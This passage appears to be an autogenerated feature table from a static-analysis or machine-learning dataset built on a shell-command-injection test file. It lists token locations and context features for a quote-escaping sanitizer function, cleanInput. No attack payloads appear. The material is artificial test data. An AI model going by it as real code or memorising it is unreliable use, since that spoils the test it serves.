last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:239:18:246:1 | return of function cleanInput | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:239:18:246:1 | return of function cleanInput | enclosingFunctionBody | s /[^A-Za-z0-9_\\/:=-]/ test s s ' s replace /'/g '\\'' ' s s replace /^(?:'')+/g replace /\\\\'''/g \\' s | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:239:18:246:1 | return of function cleanInput | enclosingFunctionName | cleanInput | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:239:18:246:1 | return of function cleanInput | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:239:28:239:28 | s | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:239:28:239:28 | s | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:239:28:239:28 | s | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:239:28:239:28 | s | contextSurroundingFunctionParameters | (s) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:239:28:239:28 | s | enclosingFunctionBody | s /[^A-Za-z0-9_\\/:=-]/ test s s ' s replace /'/g '\\'' ' s s replace /^(?:'')+/g replace /\\\\'''/g \\' s | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:239:28:239:28 | s | enclosingFunctionBody | s /[^A-Za-z0-9_\\/:=-]/ test s s ' s replace /'/g '\\'' ' s s replace /^(?:'')+/g replace /\\\\'''/g \\' s | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:239:28:239:28 | s | enclosingFunctionName | cleanInput | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:239:28:239:28 | s | enclosingFunctionName | cleanInput | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:239:28:239:28 | s | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:239:28:239:28 | s | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:240:6:240:25 | /[^A-Za-z0-9_\\/:=-]/ | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:240:6:240:25 | /[^A-Za-z0-9_\\/:=-]/ | contextSurroundingFunctionParameters | (s) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:240:6:240:25 | /[^A-Za-z0-9_\\/:=-]/ | enclosingFunctionBody | s /[^A-Za-z0-9_\\/:=-]/ test s s ' s replace /'/g '\\'' ' s s replace /^(?:'')+/g replace /\\\\'''/g \\' s | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:240:6:240:25 | /[^A-Za-z0-9_\\/:=-]/ | enclosingFunctionName | cleanInput | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:240:6:240:25 | /[^A-Za-z0-9_\\/:=-]/ | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:240:6:240:30 | /[^A-Za ... ]/.test | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:240:6:240:30 | /[^A-Za ... ]/.test | contextSurroundingFunctionParameters | (s) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:240:6:240:30 | /[^A-Za ... ]/.test | enclosingFunctionBody | s /[^A-Za-z0-9_\\/:=-]/ test s s ' s replace /'/g '\\'' ' s s replace /^(?:'')+/g replace /\\\\'''/g \\' s | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:240:6:240:30 | /[^A-Za ... ]/.test | enclosingFunctionName | cleanInput | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:240:6:240:30 | /[^A-Za ... ]/.test | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:240:6:240:33 | /[^A-Za ... test(s) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:240:6:240:33 | /[^A-Za ... test(s) | contextSurroundingFunctionParameters | (s) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:240:6:240:33 | /[^A-Za ... test(s) | enclosingFunctionBody | s /[^A-Za-z0-9_\\/:=-]/ test s s ' s replace /'/g '\\'' ' s s replace /^(?:'')+/g replace /\\\\'''/g \\' s | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:240:6:240:33 | /[^A-Za ... test(s) | enclosingFunctionName | cleanInput | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:240:6:240:33 | /[^A-Za ... test(s) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:240:6:240:33 | exceptional return of /[^A-Za ... test(s) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:240:6:240:33 | exceptional return of /[^A-Za ... test(s) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:240:6:240:33 | exceptional return of /[^A-Za ... test(s) | enclosingFunctionBody | s /[^A-Za-z0-9_\\/:=-]/ test s s ' s replace /'/g '\\'' ' s s replace /^(?:'')+/g replace /\\\\'''/g \\' s | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:240:6:240:33 | exceptional return of /[^A-Za ... test(s) | enclosingFunctionName | cleanInput | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:240:6:240:33 | exceptional return of /[^A-Za ... test(s) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:240:27:240:30 | test | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:240:27:240:30 | test | contextSurroundingFunctionParameters | (s) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:240:27:240:30 | test | enclosingFunctionBody | s /[^A-Za-z0-9_\\/:=-]/ test s s ' s replace /'/g '\\'' ' s s replace /^(?:'')+/g replace /\\\\'''/g \\' s | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:240:27:240:30 | test | enclosingFunctionName | cleanInput | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:240:27:240:30 | test | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:240:32:240:32 | s | CalleeFlexibleAccessPath | ?.test | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:240:32:240:32 | s | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:240:32:240:32 | s | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:240:32:240:32 | s | contextSurroundingFunctionParameters | (s) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:240:32:240:32 | s | enclosingFunctionBody | s /[^A-Za-z0-9_\\/:=-]/ test s s ' s replace /'/g '\\'' ' s s replace /^(?:'')+/g replace /\\\\'''/g \\' s | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:240:32:240:32 | s | enclosingFunctionName | cleanInput | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:240:32:240:32 | s | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:3:241:3 | s | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:3:241:3 | s | contextSurroundingFunctionParameters | (s) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:3:241:3 | s | enclosingFunctionBody | s /[^A-Za-z0-9_\\/:=-]/ test s s ' s replace /'/g '\\'' ' s s replace /^(?:'')+/g replace /\\\\'''/g \\' s | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:3:241:3 | s | enclosingFunctionName | cleanInput | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:3:241:3 | s | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:3:241:42 | s | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:3:241:42 | s | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:3:241:42 | s | enclosingFunctionBody | s /[^A-Za-z0-9_\\/:=-]/ test s s ' s replace /'/g '\\'' ' s s replace /^(?:'')+/g replace /\\\\'''/g \\' s | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:3:241:42 | s | enclosingFunctionName | cleanInput | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:3:241:42 | s | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:3:241:42 | s = "'" ... ) + "'" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:3:241:42 | s = "'" ... ) + "'" | contextSurroundingFunctionParameters | (s) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:3:241:42 | s = "'" ... ) + "'" | enclosingFunctionBody | s /[^A-Za-z0-9_\\/:=-]/ test s s ' s replace /'/g '\\'' ' s s replace /^(?:'')+/g replace /\\\\'''/g \\' s | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:3:241:42 | s = "'" ... ) + "'" | enclosingFunctionName | cleanInput | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:3:241:42 | s = "'" ... ) + "'" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:7:241:9 | "'" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:7:241:9 | "'" | contextSurroundingFunctionParameters | (s) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:7:241:9 | "'" | enclosingFunctionBody | s /[^A-Za-z0-9_\\/:=-]/ test s s ' s replace /'/g '\\'' ' s s replace /^(?:'')+/g replace /\\\\'''/g \\' s | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:7:241:9 | "'" | enclosingFunctionName | cleanInput | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:7:241:9 | "'" | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:7:241:9 | "'" | stringConcatenatedWith | -endpoint- s.replace() + ''' | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:7:241:36 | "'" + s ... '\\\\''") | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:7:241:36 | "'" + s ... '\\\\''") | contextSurroundingFunctionParameters | (s) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:7:241:36 | "'" + s ... '\\\\''") | enclosingFunctionBody | s /[^A-Za-z0-9_\\/:=-]/ test s s ' s replace /'/g '\\'' ' s s replace /^(?:'')+/g replace /\\\\'''/g \\' s | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:7:241:36 | "'" + s ... '\\\\''") | enclosingFunctionName | cleanInput | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:7:241:36 | "'" + s ... '\\\\''") | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:241:7:241:42 | "'" + s ... ) + "'" | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, 